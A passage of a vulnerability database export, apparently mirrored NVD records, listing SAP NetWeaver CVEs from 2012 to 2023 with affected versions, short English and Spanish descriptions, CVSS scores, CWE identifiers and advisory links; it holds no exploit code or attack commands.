},
{
"criteria": "cpe:2.3:a:sap:netweaver_application_server_abap:7.81:*:*:*:*:*:*:*",
"matchCriteriaId": "252DCEF2-8DDF-467F-8869-B69A0A3426F8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver_application_server_abap:7.85:*:*:*:*:*:*:*",
"matchCriteriaId": "9BC578BE-2308-491E-9D56-6B45AFF0FCFA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver_application_server_abap:7.89:*:*:*:*:*:*:*",
"matchCriteriaId": "4C5C5010-9631-4C70-AD90-A0D16B03BFA5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver_application_server_abap:7.91:*:*:*:*:*:*:*",
"matchCriteriaId": "5E1807BC-8549-438A-BF6F-DD15C660CCF5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver_application_server_abap:krnl64uc:*:*:*:*:*:*:*",
"matchCriteriaId": "4F6FABE8-A600-491F-AF0A-049F5E5C1E16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver_application_server_abap:krnl64uc_7.22:*:*:*:*:*:*:*",
"matchCriteriaId": "23257C18-B75C-471C-9EAF-1E86DEE845FA",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "SAP GUI for HTML - versions KERNEL 7.22, 7.53, 7.54, 7.77, 7.81, 7.85, 7.89, 7.91, KRNL64UC, 7.22, 7.22EXT, KRNL64UC 7.22, 7.22EXT does not sufficiently encode user-controlled inputs, resulting in a reflected Cross-Site Scripting (XSS) vulnerability. An attacker could craft a malicious URL and lure the victim to click, the script supplied by the attacker will execute in the victim user\u0027s browser. The information from the victim\u0027s web browser can either be modified or read and sent to the attacker.\n\n"
}
],
"id": "CVE-2023-27499",
"lastModified": "2024-11-21T07:53:01.980",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "cna@sap.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2023-04-11T03:15:07.547",
"references": [
{
"source": "cna@sap.com",
"tags": [
"Permissions Required"
],
"url": "https://launchpad.support.sap.com/#/notes/3275458"
},
{
"source": "cna@sap.com",
"tags": [
"Vendor Advisory"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://launchpad.support.sap.com/#/notes/3275458"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
],
"sourceIdentifier": "cna@sap.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "cna@sap.com",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2018-07-10 18:29
Modified
2024-11-21 04:03
Severity ?
Summary
A content spoofing vulnerability in the following components allows to render html pages containing arbitrary plain text content, which might fool an end user: UI add-on for SAP NetWeaver (UI_Infra, 1.0), SAP UI Implementation for Decoupled Innovations (UI_700, 2.0): SAP NetWeaver 7.00 Implementation, SAP User Interface Technology (SAP_UI 7.4, 7.5, 7.51, 7.52). There is little impact as it is not possible to embed active contents such as JavaScript or hyperlinks.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cna@sap.com | http://www.securityfocus.com/bid/105088 | Third Party Advisory, VDB Entry | |
| cna@sap.com | https://launchpad.support.sap.com/#/notes/2633180 | Permissions Required, Vendor Advisory | |
| cna@sap.com | https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=497256000 | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/105088 | Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | https://launchpad.support.sap.com/#/notes/2633180 | Permissions Required, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=497256000 | Vendor Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| sap | netweaver | 7.0 | |
| sap | ui_infra | 1.0 | |
| sap | user_interface_technology | 7.4 | |
| sap | user_interface_technology | 7.5 | |
| sap | user_interface_technology | 7.51 | |
| sap | user_interface_technology | 7.52 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "41FAC5DD-D577-47F9-B0CA-006032256642",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:ui_infra:1.0:*:*:*:*:netweaver:*:*",
"matchCriteriaId": "7DD5CD65-0219-4EBF-8F7E-35CAAB855EC6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:user_interface_technology:7.4:*:*:*:*:*:*:*",
"matchCriteriaId": "35C9C962-EE9F-441A-9DD7-BBAAC8D31297",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:user_interface_technology:7.5:*:*:*:*:*:*:*",
"matchCriteriaId": "C6DF1996-37A7-4C8D-9869-80EBA93243C9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:user_interface_technology:7.51:*:*:*:*:*:*:*",
"matchCriteriaId": "62E6239F-04B5-44BB-8589-788A77A68081",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:user_interface_technology:7.52:*:*:*:*:*:*:*",
"matchCriteriaId": "2B78A3DD-80C5-4DBD-8BF7-27E923262B45",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "A content spoofing vulnerability in the following components allows to render html pages containing arbitrary plain text content, which might fool an end user: UI add-on for SAP NetWeaver (UI_Infra, 1.0), SAP UI Implementation for Decoupled Innovations (UI_700, 2.0): SAP NetWeaver 7.00 Implementation, SAP User Interface Technology (SAP_UI 7.4, 7.5, 7.51, 7.52). There is little impact as it is not possible to embed active contents such as JavaScript or hyperlinks."
},
{
"lang": "es",
"value": "Una vulnerabilidad de suplantaci\u00f3n de contenido en los siguentes componentes permite renderizar p\u00e1ginas HTML que contienen texto plano arbitrario, lo que podr\u00eda enga\u00f1ar a un usuario final: UI add-on para SAP NetWeaver (UI_Infra, 1.0), SAP UI Implementation para Decoupled Innovations (UI_700, 2.0): SAP NetWeaver 7.00 Implementation, SAP User Interface Technology (SAP_UI 7.4, 7.5, 7.51 y 7.52). No supone mucho impacto, ya que no es posible embeber contenido activo como JavaScript o hiperv\u00ednculos."
}
],
"id": "CVE-2018-2434",
"lastModified": "2024-11-21T04:03:48.430",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2018-07-10T18:29:00.967",
"references": [
{
"source": "cna@sap.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/105088"
},
{
"source": "cna@sap.com",
"tags": [
"Permissions Required",
"Vendor Advisory"
],
"url": "https://launchpad.support.sap.com/#/notes/2633180"
},
{
"source": "cna@sap.com",
"tags": [
"Vendor Advisory"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=497256000"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/105088"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Vendor Advisory"
],
"url": "https://launchpad.support.sap.com/#/notes/2633180"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=497256000"
}
],
"sourceIdentifier": "cna@sap.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-345"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2021-09-14 12:15
Modified
2024-11-21 06:16
Severity ?
9.9 (Critical) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Summary
SAP NetWeaver (Visual Composer 7.0 RT) versions - 7.30, 7.31, 7.40, 7.50, without restriction, an attacker authenticated as a non-administrative user can upload a malicious file over a network and trigger its processing, which is capable of running operating system commands with the privilege of the Java Server process. These commands can be used to read or modify any information on the server or shut the server down making it unavailable.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cna@sap.com | https://launchpad.support.sap.com/#/notes/3084487 | Permissions Required | |
| cna@sap.com | https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=585106405 | Broken Link, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://launchpad.support.sap.com/#/notes/3084487 | Permissions Required | |
| af854a3a-2127-422b-91ae-364da2661108 | https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=585106405 | Broken Link, Vendor Advisory |
Impacted products
{
"cisaActionDue": "2022-06-30",
"cisaExploitAdd": "2022-06-09",
"cisaRequiredAction": "Apply updates per vendor instructions.",
"cisaVulnerabilityName": "SAP NetWeaver Unrestricted File Upload Vulnerability",
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"matchCriteriaId": "606EFE4F-57A4-44E2-A98D-F0867A658218",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.31:*:*:*:*:*:*:*",
"matchCriteriaId": "FECD5E96-7669-4747-80D2-27F95BF420BC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"matchCriteriaId": "F019F7F5-7740-4BD4-850F-D7A1923C6200",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.50:*:*:*:*:*:*:*",
"matchCriteriaId": "F2B37045-2FB7-49BB-AE38-B84FAA6ADFB0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "SAP NetWeaver (Visual Composer 7.0 RT) versions - 7.30, 7.31, 7.40, 7.50, without restriction, an attacker authenticated as a non-administrative user can upload a malicious file over a network and trigger its processing, which is capable of running operating system commands with the privilege of the Java Server process. These commands can be used to read or modify any information on the server or shut the server down making it unavailable.\n\n"
},
{
"lang": "es",
"value": "SAP NetWeaver (Visual Composer 7.0 RT) versiones - 7.30, 7.31, 7.40, 7.50, sin restricci\u00f3n, un atacante autenticado como usuario no administrativo puede cargar un archivo malicioso a trav\u00e9s de la red y desencadenar su procesamiento, que es capaz de ejecutar comandos del sistema operativo con el privilegio del proceso del servidor Java. Estos comandos pueden ser usados para leer o modificar cualquier informaci\u00f3n en el servidor o apagar el servidor haciendo que no est\u00e9 disponible"
}
],
"id": "CVE-2021-38163",
"lastModified": "2024-11-21T06:16:31.867",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.9,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.1,
"impactScore": 6.0,
"source": "cna@sap.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2021-09-14T12:15:10.890",
"references": [
{
"source": "cna@sap.com",
"tags": [
"Permissions Required"
],
"url": "https://launchpad.support.sap.com/#/notes/3084487"
},
{
"source": "cna@sap.com",
"tags": [
"Broken Link",
"Vendor Advisory"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=585106405"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://launchpad.support.sap.com/#/notes/3084487"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link",
"Vendor Advisory"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=585106405"
}
],
"sourceIdentifier": "cna@sap.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-22"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2013-08-16 17:55
Modified
2024-11-21 01:53
Severity ?
Summary
The GetComputerSystem method in the HostControl service in SAP Netweaver 7.03 allows remote attackers to obtain sensitive information via a crafted SOAP request to TCP port 1128.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.03:*:*:*:*:*:*:*",
"matchCriteriaId": "369D0212-65DA-4121-981B-1F07B7465F97",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The GetComputerSystem method in the HostControl service in SAP Netweaver 7.03 allows remote attackers to obtain sensitive information via a crafted SOAP request to TCP port 1128."
},
{
"lang": "es",
"value": "El metodo GetComputerSystem en el servicio HostControl en SAP Netweaver v7.03 permite a atacantes remotos obtener informaci\u00f3n sensible a trav\u00e9s de una solicitud SOAP manipulada al puerto TCP 1128."
}
],
"id": "CVE-2013-3319",
"lastModified": "2024-11-21T01:53:22.450",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2013-08-16T17:55:05.050",
"references": [
{
"source": "cve@mitre.org",
"url": "http://labs.integrity.pt/advisories/cve-2013-3319/"
},
{
"source": "cve@mitre.org",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/54277"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/85905"
},
{
"source": "cve@mitre.org",
"url": "https://service.sap.com/sap/support/notes/1816536"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://labs.integrity.pt/advisories/cve-2013-3319/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/54277"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/85905"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://service.sap.com/sap/support/notes/1816536"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-200"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2013-11-20 14:12
Modified
2024-11-21 01:59
Severity ?
Summary
Directory traversal vulnerability in the Exportability Check Service in SAP NetWeaver allows remote attackers to read arbitrary files via unspecified vectors.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CB7AAA9B-5209-4419-87DA-8130843AD2AF",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Directory traversal vulnerability in the Exportability Check Service in SAP NetWeaver allows remote attackers to read arbitrary files via unspecified vectors."
},
{
"lang": "es",
"value": "Vulnerabilidad de recorrido de directorio en Exportability Check Service de SAP NetWeaver permite a atacantes remotos leer archivos arbitrarios a trav\u00e9s de vectores sin especificar."
}
],
"id": "CVE-2013-6821",
"lastModified": "2024-11-21T01:59:46.430",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2013-11-20T14:12:31.007",
"references": [
{
"source": "cve@mitre.org",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/dsecrg-13-003-sap-netweaver-exportability-check-service-unauthorized-directory-traversal/"
},
{
"source": "cve@mitre.org",
"url": "https://service.sap.com/sap/support/notes/1628537"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/dsecrg-13-003-sap-netweaver-exportability-check-service-unauthorized-directory-traversal/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://service.sap.com/sap/support/notes/1628537"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-22"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2013-11-23 19:55
Modified
2024-11-21 01:59
Severity ?
Summary
SQL injection vulnerability in the SRTT_GET_COUNT_BEFORE_KEY_RFC function in SAP NetWeaver 7.30 allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"matchCriteriaId": "606EFE4F-57A4-44E2-A98D-F0867A658218",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "SQL injection vulnerability in the SRTT_GET_COUNT_BEFORE_KEY_RFC function in SAP NetWeaver 7.30 allows remote attackers to execute arbitrary SQL commands via unspecified vectors."
},
{
"lang": "es",
"value": "Vulnerabilidad de inyecci\u00f3n SQL en la funci\u00f3n SRTT_GET_COUNT_BEFORE_KEY_RFC en SAP NetWeaver 7.30 que permite a atacantes remotos ejecutar comandos SQL de su elecci\u00f3n a trav\u00e9s de vectores no especificados."
}
],
"id": "CVE-2013-6869",
"lastModified": "2024-11-21T01:59:52.290",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2013-11-23T19:55:03.783",
"references": [
{
"source": "cve@mitre.org",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/55736"
},
{
"source": "cve@mitre.org",
"url": "http://www.securitytracker.com/id/1029352"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/erpscan-13-017-sap-netweaver-srtt_get_count_before_key_rfc-sql-injection/"
},
{
"source": "cve@mitre.org",
"url": "https://service.sap.com/sap/support/notes/1783795"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/55736"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securitytracker.com/id/1029352"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/erpscan-13-017-sap-netweaver-srtt_get_count_before_key_rfc-sql-injection/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://service.sap.com/sap/support/notes/1783795"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-89"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2012-02-23 20:07
Modified
2024-11-21 01:36
Severity ?
Summary
Unspecified vulnerability in the com.sap.aii.mdt.amt.web.AMTPageProcessor servlet in SAP NetWeaver 7.0 allows remote attackers to obtain sensitive information about the Adapter Monitor via unspecified vectors, possibly related to the EnableInvokerServletGlobally property in the servlet_jsp service.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "41FAC5DD-D577-47F9-B0CA-006032256642",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Unspecified vulnerability in the com.sap.aii.mdt.amt.web.AMTPageProcessor servlet in SAP NetWeaver 7.0 allows remote attackers to obtain sensitive information about the Adapter Monitor via unspecified vectors, possibly related to the EnableInvokerServletGlobally property in the servlet_jsp service."
},
{
"lang": "es",
"value": "Una vulnerabilidad no especificada en el servlet com.sap.aii.mdt.amt.web.AMTPageProcessor en SAP NetWeaver v7.0 permite a atacantes remotos obtener informaci\u00f3n sensible sobre el \"Adapter Monitor\" a trav\u00e9s de vectores no especificados. Posiblemente la vulnerabilidad esta relacionada con la propiedad EnableInvokerServletGlobally en el servicio servlet_jsp."
}
],
"id": "CVE-2012-1291",
"lastModified": "2024-11-21T01:36:46.870",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2012-02-23T20:07:25.957",
"references": [
{
"source": "cve@mitre.org",
"url": "http://dsecrg.com/pages/vul/show.php?id=415"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/47861"
},
{
"source": "cve@mitre.org",
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/52101"
},
{
"source": "cve@mitre.org",
"url": "https://service.sap.com/sap/support/notes/1585527"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://dsecrg.com/pages/vul/show.php?id=415"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/47861"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/52101"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://service.sap.com/sap/support/notes/1585527"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2016-04-14 14:59
Modified
2024-11-21 02:51
Severity ?
Summary
The Enqueue Server in SAP NetWeaver JAVA AS 7.1 through 7.4 allows remote attackers to cause a denial of service (process crash) via a crafted request, aka SAP Security Note 2258784.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.1:*:*:*:java_as:*:*:*",
"matchCriteriaId": "34D87010-59CC-453C-B4E0-96479CEC0DF8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.2:*:*:*:java_as:*:*:*",
"matchCriteriaId": "FD5ED83F-7284-4EB8-900A-EE511D6D3543",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.3:*:*:*:java_as:*:*:*",
"matchCriteriaId": "273D7823-5F61-40B2-8893-EB4019F764B1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.4:*:*:*:java_as:*:*:*",
"matchCriteriaId": "8026745D-FDEA-4CC9-A26C-E408996E78F3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
